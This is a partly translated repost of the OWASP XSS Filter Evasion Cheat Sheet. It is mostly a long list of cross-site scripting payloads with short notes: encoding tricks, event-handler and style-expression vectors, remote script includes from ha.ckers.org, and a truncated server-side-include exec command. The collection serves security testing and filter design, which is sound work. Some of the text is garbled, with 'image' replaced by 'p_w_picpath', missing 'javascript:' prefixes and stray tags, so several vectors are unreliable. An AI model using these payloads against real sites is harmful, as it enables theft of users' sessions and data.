XSS Filter Evasion Compendium: collection, cheat sheet, summary
XSS Filter Evasion Cheat Sheet
Introduction:
Translation: 落泪红尘 r00ts www.sh3llc0de.com
Only part of it has been translated; the rest will be translated when there is time.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
This article is a guide to help application security professionals test for cross-site scripting.

This cheat sheet is for people who already know what cross-site scripting attacks are but want a deeper understanding of filter evasion.

<h2>XSS Locator</h2>
<pre>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></pre>
<div>
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use a URL-encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, injecting the deprecated <PLAINTEXT> tag is often enough to tell whether something is vulnerable to XSS, because it messes up the output appreciably.
</div>
<h2>XSS Locator 2</h2>
<div>
If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a compact XSS injection check. After injecting it, view the source and look for <XSS versus &lt;XSS to tell whether the page is vulnerable:
</div>
<pre>'';!--"<XSS>=&{()}</pre>
<h2>No filter evasion</h2>
<div>
This is a normal XSS JavaScript injection and the one most likely to get caught, but I suggest trying it first (in current browsers the quotes are not required, so they are omitted here):
</div>
<pre><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></pre>
<h2>Image XSS using the JavaScript directive</h2>
<div>
Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in the context of an image, but it does in other contexts; the following shows the principle, which works in other tags as well). Note that no current browser executes a javascript: URL in an image source, so the IMG SRC vectors below document legacy IE behaviour:
</div>
<pre><IMG SRC="javascript:alert('XSS');"></pre>
<h2>No quotes and no semicolon</h2>
<pre><IMG SRC=javascript:alert('XSS')></pre>
<h2>Case insensitive XSS attack vector</h2>
<pre><IMG SRC=JaVaScRiPt:alert('XSS')></pre>
<h2>HTML entities</h2>
<div>
The semicolons are required for this to work:
</div>
<pre><IMG SRC=javascript:alert(&quot;XSS&quot;)></pre>
<h2>Grave accent obfuscation</h2>
<div>
If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string. This is also useful because many cross-site scripting filters don't know about grave accents:
</div>
<pre><IMG SRC=`javascript:alert("RSnake says, 'XSS'")`></pre>
<h2>Malformed IMG tags</h2>
<div>
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:
</div>
<pre><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></pre>
<h2>fromCharCode</h2>
<div>
If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:
</div>
<pre><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></pre>
<h2>UTF-8 Unicode encoding</h2>
<div>
Despite the heading, these are decimal HTML character references, not UTF-8. All of the XSS examples that use a javascript: directive inside an <IMG tag will not work in Firefox or Netscape 8.1+ in Gecko rendering engine mode. Use the XSS Calculator for more information:
</div>
<pre><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;></pre>
<h2>Long UTF-8 Unicode encoding without semicolons</h2>
<div>
This is often effective against XSS filters that look for "&#XX;", since most people don't know about padding: up to 7 numeric characters total. It is also useful against code that decodes with something like $tmp_string =~ s/.*\&#(\d+);.*/$1/;, which incorrectly assumes a semicolon is required to terminate an HTML-encoded string (I've seen this in the wild):
</div>
<pre><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></pre>
<h2>Hex encoding without semicolons</h2>
<div>
This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/;, which assumes that a decimal digit follows the pound symbol, which is not true with hex HTML characters. Use the XSS calculator for more information:
</div>
<pre><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></pre>
<h2>Embedded tab</h2>
<div>
Used to break up the cross-site scripting attack (the character between "jav" and "ascript" is a literal horizontal tab):
</div>
<pre><IMG SRC="jav	ascript:alert('XSS');"></pre>
<h2>Embedded encoded tab</h2>
<div>
Use this one to break up XSS:
</div>
<pre><IMG SRC="jav&#x09;ascript:alert('XSS');"></pre>
<h2>Embedded newline to break up XSS</h2>
<div>
Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following examples illustrate this vector:
</div>
<pre><IMG SRC="jav&#x0A;ascript:alert('XSS');"></pre>
<h2>Embedded carriage return to break up XSS</h2>
<div>
(Note: with the above I am making these strings longer than they have to be, because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
</div>
<pre><IMG SRC="jav&#x0D;ascript:alert('XSS');"></pre>
<h2>Null breaks up JavaScript directive</h2>
<div>
Null chars also work as XSS vectors, but not like the above: you need to inject them directly using something like Burp Proxy, or use %00 in the URL string, or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again: older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char, 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real-world filters with a variation on this example:
</div>
<pre>perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out</pre>
<h2>Spaces and meta chars before the JavaScript in images for XSS</h2>
<div>
This is useful if the pattern match doesn't take into account spaces in the word "javascript:" (which is correct, since that won't render) and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is that you can have any char from 1-32 in decimal:
</div>
<pre><IMG SRC=" &#14;  javascript:alert('XSS');"></pre>
<h2>Non-alpha-non-digit XSS</h2>
<div>
The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be whitespace or a non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s":
</div>
<pre><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
Based on the same idea as above, but expanded on it using the rnaske fuzzer. The Gecko rendering engine allows any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc.) between the event handler and the equals sign, making it easier to bypass cross-site scripting blocks. Note that this also applies to the grave accent char, as seen here:
</div>
<pre><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></pre>
<div>
Yair Amit brought to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
</div>
<pre><SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<h2>Extraneous open brackets</h2>
<div>
Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first matching pairs of open and close angle brackets and then comparing the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:
</div>
<pre><<SCRIPT>alert("XSS");//<</SCRIPT></pre>
<h2>No closing script tags</h2>
<div>
In Firefox and Netscape 8.1 in Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this cross-site scripting vector. Firefox assumes it's safe to close the HTML tag and adds closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware: I have no idea what the HTML will end up looking like once this is injected:
</div>
<pre><SCRIPT SRC=http://ha.ckers.org/xss.js?< B ></pre>
<h2>Protocol resolution in script tags</h2>
<div>
This particular variant was submitted by Łukasz Pilorz and was based partially on Ozh's protocol resolution bypass below. This cross-site scripting example works in IE, Netscape in IE rendering mode and Opera if you add a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid regardless of the encoding type, because the browser knows it in the context of a SCRIPT tag.
</div>
<pre><SCRIPT SRC=//ha.ckers.org/.j></pre>
<h2>Half open HTML/JavaScript XSS vector</h2>
<div>
Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. It assumes there is some HTML tag below where you are injecting this cross-site scripting vector: even though there is no closing ">", the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also effective against a real-world XSS filter I came across, using an open-ended <IFRAME tag instead of an <IMG tag:
</div>
<pre><IMG SRC="javascript:alert('XSS')"</pre>
<h2>Double open angle brackets</h2>
<div>
Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:
</div>
<pre><iframe src=http://ha.ckers.org/scriptlet.html <</pre>
<h2>Escaping JavaScript escapes</h2>
<div>
When the application is written to output some user information inside of JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server-side application escapes certain quotes, you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT>, which ends up un-escaping the double quote and causing the cross-site scripting vector to fire.
The XSS locator uses this method:
</div>
<pre>\";alert('XSS');//</pre>
<h2>End title tag</h2>
<div>
This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross-site scripting attack:
</div>
<pre></TITLE><SCRIPT>alert("XSS");</SCRIPT></pre>
<h2>INPUT image</h2>
<pre><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></pre>
<h2>BODY image</h2>
<pre><BODY BACKGROUND="javascript:alert('XSS')"></pre>
<h2>IMG Dynsrc</h2>
<pre><IMG DYNSRC="javascript:alert('XSS')"></pre>
<h2>IMG lowsrc</h2>
<pre><IMG LOWSRC="javascript:alert('XSS')"></pre>
<h2>List-style-image</h2>
<div>
Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross-site scripting vector:
</div>
<pre><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br></pre>
<h2>VBscript in an image</h2>
<pre><IMG SRC='vbscript:msgbox("XSS")'></pre>
<h2>Livescript (older versions of Netscape only)</h2>
<pre><IMG SRC="livescript:[code]"></pre>
<h2>BODY tag</h2>
<div>
This method doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack. Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):
</div>
<pre><BODY ONLOAD=alert('XSS')></pre>
<h2>Event Handlers</h2>
<div>
These can be used in XSS attacks similar to the one above (this is the most comprehensive list on the net at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates:
</div>
<pre> 1. FSCommand() (attacker can use this when executed from within an embedded Flash object)</pre>
<pre> 2. onAbort() (when user aborts the loading of an image)</pre>
<pre> 3. onActivate() (when object is set as the active element)</pre>
<pre> 4. onAfterPrint() (activates after user prints or previews print job)</pre>
<pre> 5. onAfterUpdate() (activates on data object after updating data in the source object)</pre>
<pre> 6. onBeforeActivate() (fires before the object is set as the active element)</pre>
<pre> 7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard; attackers can do this with the execCommand("Copy") function)</pre>
<pre> 8. onBeforeCut() (attacker executes the attack string right before a selection is cut)</pre>
<pre> 9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)</pre>
<pre> 10. onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)</pre>
<pre> 11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)</pre>
<pre> 12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function)</pre>
<pre> 13. onBeforeUnload() (user would need to be tricked into closing the browser; attacker cannot unload windows unless it was spawned from the parent)</pre>
<pre> 14. onBegin() (the onbegin event fires immediately when the element's timeline begins)</pre>
<pre> 15. onBlur() (in the case where another popup is loaded and the window loses focus)</pre>
<pre> 16. onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)</pre>
<pre> 17. onCellChange() (fires when data changes in the data provider)</pre>
<pre> 18. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)</pre>
<pre> 19. onClick() (someone clicks on a form)</pre>
<pre> 20. onContextMenu() (user would need to right click on attack area)</pre>
<pre> 21. onControlSelect() (fires when the user is about to make a control selection of the object)</pre>
<pre> 22. onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)</pre>
<pre> 23. onCut() (user needs to cut something or it can be exploited using the execCommand("Cut") command)</pre>
<pre> 24. onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)</pre>
<pre> 25. onDataSetChanged() (fires when the data set exposed by a data source object changes)</pre>
<pre> 26. onDataSetComplete() (fires to indicate that all data is available from the data source object)</pre>
<pre> 27. onDblClick() (user double-clicks a form element or a link)</pre>
<pre> 28. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)</pre>
<pre> 29. onDrag() (requires that the user drags an object)</pre>
<pre> 30. onDragEnd() (requires that the user drags an object)</pre>
<pre> 31. onDragLeave() (requires that the user drags an object off a valid location)</pre>
<pre> 32. onDragEnter() (requires that the user drags an object into a valid location)</pre>
<pre> 33. onDragOver() (requires that the user drags an object into a valid location)</pre>
<pre> 34. onDragDrop() (user drops an object (e.g. file) onto the browser window)</pre>
<pre> 35. onDrop() (user drops an object (e.g. file) onto the browser window)</pre>
<pre> 36. onEnd() (the onEnd event fires when the timeline ends)</pre>
<pre> 37. onError() (loading of a document or image causes an error)</pre>
<pre> 38. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)</pre>
<pre> 39. onFilterChange() (fires when a visual filter completes state change)</pre>
<pre> 40. onFinish() (attacker can create the exploit when marquee is finished looping)</pre>
<pre> 41. onFocus() (attacker executes the attack string when the window gets focus)</pre>
<pre> 42. onFocusIn() (attacker executes the attack string when window gets focus)</pre>
<pre> 43. onFocusOut() (attacker executes the attack string when window loses focus)</pre>
<pre> 44. onHelp() (attacker executes the attack string when the user hits F1 while the window is in focus)</pre>
<pre> 45. onKeyDown() (user depresses a key)</pre>
<pre> 46. onKeyPress() (user presses or holds down a key)</pre>
<pre> 47. onKeyUp() (user releases a key)</pre>
<pre> 48. onLayoutComplete() (user would have to print or print preview)</pre>
<pre> 49. onLoad() (attacker executes the attack string after the window loads)</pre>
<pre> 50. onLoseCapture() (can be exploited by the releaseCapture() method)</pre>
<pre> 51. onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing)</pre>
<pre> 52. onMediaError() (user opens a page in the browser that contains a media file, and the event fires when there is a problem)</pre>
<pre> 53. onMouseDown() (the attacker would need to get the user to click on an image)</pre>
<pre> 54. onMouseEnter() (cursor moves over an object or area)</pre>
<pre> 55. onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)</pre>
<pre> 56. onMouseMove() (the attacker would need to get the user to mouse over an image or table)</pre>
<pre> 57. onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)</pre>
<pre> 58. onMouseOver() (cursor moves over an object or area)</pre>
<pre> 59. onMouseUp() (the attacker would need to get the user to click on an image)</pre>
<pre> 60. onMouseWheel() (the attacker would need to get the user to use their mouse wheel)</pre>
<pre> 61. onMove() (user or attacker would move the page)</pre>
<pre> 62. onMoveEnd() (user or attacker would move the page)</pre>
<pre> 63. onMoveStart() (user or attacker would move the page)</pre>
<pre> 64. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)</pre>
<pre> 65. onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)</pre>
<pre> 66. onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)</pre>
<pre> 67. onProgress() (attacker would use this as a Flash movie was loading)</pre>
<pre> 68. onPropertyChange() (user or attacker would need to change an element property)</pre>
<pre> 69. onReadyStateChange() (user or attacker would need to change an element property)</pre>
<pre> 70. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)</pre>
<pre> 71. onReset() (user or attacker resets a form)</pre>
<pre> 72. onResize() (user would resize the window; attacker could auto-initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)</pre>
<pre> 73. onResizeEnd() (user would resize the window; attacker could auto-initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)</pre>
<pre> 74. onResizeStart() (user would resize the window; attacker could auto-initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)</pre>
<pre> 75. onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)</pre>
<pre> 76. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)</pre>
<pre> 77. onRowsEnter() (user or attacker would need to change a row in a data source)</pre>
<pre> 78. onRowExit() (user or attacker would need to change a row in a data source)</pre>
<pre> 79. onRowDelete() (user or attacker would need to delete a row in a data source)</pre>
<pre> 80. onRowInserted() (user or attacker would need to insert a row in a data source)</pre>
<pre> 81. onScroll() (user would need to scroll, or attacker could use the scrollBy() function)</pre>
<pre> 82. onSeek() (the onseek event fires when the timeline is set to play in any direction other than forward)</pre>
<pre> 83. onSelect() (user needs to select some text; attacker could auto-initialize with something like: window.document.execCommand("SelectAll");)</pre>
<pre> 84. onSelectionChange() (user needs to select some text; attacker could auto-initialize with something like: window.document.execCommand("SelectAll");)</pre>
<pre> 85. onSelectStart() (user needs to select some text; attacker could auto-initialize with something like: window.document.execCommand("SelectAll");)</pre>
<pre> 86. onStart() (fires at the beginning of each marquee loop)</pre>
<pre> 87. onStop() (user would need to press the stop button or leave the webpage)</pre>
<pre> 88. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)</pre>
<pre> 89. onSubmit() (requires attacker or user submits a form)</pre>
<pre> 90. onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)</pre>
<pre> 91. onTrackChange() (user or attacker changes track in a playList)</pre>
<pre> 92. onUnload() (as the user clicks any link or presses the back button or attacker forces a click)</pre>
<pre> 93. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by an HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)</pre>
<pre> 94. seekSegmentTime() (this is a method that locates the specified point on the element's segment timeline and begins playing from that point. The segment consists of one repetition of the timeline including reverse play using the AUTOREVERSE attribute.)</pre>
<h2>BGSOUND</h2>
<pre><BGSOUND SRC="javascript:alert('XSS');"></pre>
<h2>& JavaScript includes</h2>
<pre><BR SIZE="&{alert('XSS')}"></pre>
<h2>STYLE sheet</h2>
<pre><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></pre>
<h2>Remote style sheet</h2>
<div>
(Using something as simple as a remote style sheet you can include your XSS, as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: all of these remote style sheet examples use the body tag, so they won't work unless there is some content on the page other than the vector itself; you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
</div>
<pre><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></pre>
<h2>Remote style sheet part 2</h2>
<div>
This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag. A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross-site scripting attack, which has come up at least once in the real world:
</div>
<pre><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></pre>
<h2>Remote style sheet part 3</h2>
<div>
This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC 2616, setting a Link header is not part of the HTTP/1.1 spec; however, some browsers still allow it (like Firefox and Opera).
The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox: </div><pre><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></pre> <h2>Remote style sheet part 4</h2> <div> This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: </div><pre><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></pre> <h2>STYLE tags with broken up JavaScript for XSS</h2> <div> This XSS at times sends IE into an infinite loop of alerts: </div><pre><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></pre> <h2>STYLE attribute using a comment to break up expression</h2> <div> Created by Roman Ivanov </div><pre><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></pre> <h2>IMG STYLE with expression</h2> <div> This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop: </div><pre>exp/*<A STYLE='no\xss:noxss("*//*");</pre><pre>xss:ex/*XSS*//*/*/pression(alert("XSS"))'></pre> <h2>STYLE tag (Older versions of Netscape only)</h2><pre><STYLE TYPE="text/javascript">alert('XSS');</STYLE></pre> <h2>STYLE tag using background-p_w_picpath</h2><pre><STYLE>.XSS{background-p_w_picpath:url("alert('XSS')");}< /STYLE><A></A></pre> <h2>STYLE tag using background</h2><pre><STYLE type="text/css">BODY{url("javascript:alert('XSS')")}< /STYLE></pre> <div> <STYLE type="text/css">BODY{url("javascript:alert('XSS')")}< /STYLE> </div> <h2>Anonymous HTML with STYLE attribute</h2> <div> IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build 
exists or not, as long as it starts with an open angle bracket and a letter: </div><pre><XSS STYLE="xss:alert('XSS'))">< /pre> <h2>Local htc file</h2> <div> This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: </div><pre><XSS STYLE=" url(xss.htc);">< /pre> <h2>US-ASCII encoding</h2> <div> US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. </div><pre>¼script¾alert(¢XSS¢)¼/script¾</pre> <h2>META</h2> <div> The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs: </div><pre><META HTTP-EQUIV="refresh" CONTENT="0;javascript:alert('XSS');">< /pre> <h3>META using data</h3> <div> Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. 
You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: </div><pre><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></pre> <h3>META with additional URL parameter</h3> <div> If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann): </div><pre><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;javascript:alert('XSS');">< /pre> <h2>IFRAME</h2> <div> If iframes are allowed there are a lot of other XSS problems as well: </div><pre><IFRAME SRC="alert('XSS');">< /IFRAME></pre> <h2>FRAME</h2> <div> Frames have the same sorts of XSS problems as iframes </div><pre><FRAMESET><FRAME SRC="alert('XSS');">< /FRAMESET></pre> <h2>TABLE</h2><pre><TABLE BACKGROUND="alert('XSS')">< /pre> <h3>TD</h3> <div> Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors: </div><pre><TABLE><TD BACKGROUND="alert('XSS')">< /pre> <h2>DIV</h2> <h3>DIV background-p_w_picpath</h3><pre><DIV STYLE="background-p_w_picpath: javascript:alert('XSS'))">< /pre> <h3>DIV background-p_w_picpath with unicoded XSS exploit</h3> <div> This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail: </div><pre><DIV STYLE="background-p_w_picpath:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></pre> <h3>DIV background-p_w_picpath plus extra characters</h3> <div> Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. 
(Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279): </div><pre><DIV STYLE="background-p_w_picpath: url(&#1;alert('XSS'))">< /pre> <h3>DIV expression</h3> <div> A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression": </div><pre><DIV STYLE="width: alert('XSS'));">< /pre> <h2>Downlevel-Hidden block</h2> <div> Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: </div><pre><!--[if gte IE 4]></pre><pre> <SCRIPT>alert('XSS');</SCRIPT></pre><pre> <![endif]--></pre> <h2>BASE tag</h2> <div> Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed p_w_picpaths like "p_w_picpaths/p_w_picpath.jpg" rather than full paths. If the path includes a leading forward slash like "/p_w_picpaths/p_w_picpath.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): </div><pre><BASE HREF="alert('XSS'); //"></pre> <h2>OBJECT tag</h2> <div> If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: </div><pre> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></pre> <h2>Using an EMBED tag you can embed a Flash movie that contains XSS</h2> <div> Click here for a demo. 
If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info): </div><pre><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></pre> <h2>You can EMBED SVG which can contain your XSS vector</h2> <div> This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one. </div><pre><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></pre> <h2>Using ActionScript inside flash can obfuscate your XSS vector</h2><pre>a="get";</pre><pre>b="URL(\"";</pre><pre>c="javascript:";</pre><pre>d="alert('XSS');\")";</pre><pre>eval(a+b+c+d);</pre> <h2>XML data island with CDATA obfuscation</h2> <div> This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode. Vector found by Sec Consult while auditing Yahoo: </div><pre><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML></pre><pre><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></pre> <h2>Locally hosted XML with embedded JavaScript that is generated using an XML data island</h2> <div> This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site 
scripting vector. You can see the result here: </div><pre><XML SRC="xsstest.xml" ID=I></XML></pre><pre><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></pre> <h2>HTML+TIME in XML</h2> <div> This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode, and remember that you need to be between HTML and BODY tags for this to work: </div><pre><HTML><BODY></pre><pre><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"></pre><pre><?import namespace="t" implementation="#default#time2"></pre><pre><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></pre><pre></BODY></HTML></pre> <h2>Assuming you can only fit in a few characters and it filters against ".js"</h2> <div> You can rename your JavaScript file to an image as an XSS vector: </div><pre><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></pre> <h2>SSI (Server Side Includes)</h2> <div> This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: </div><pre><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT 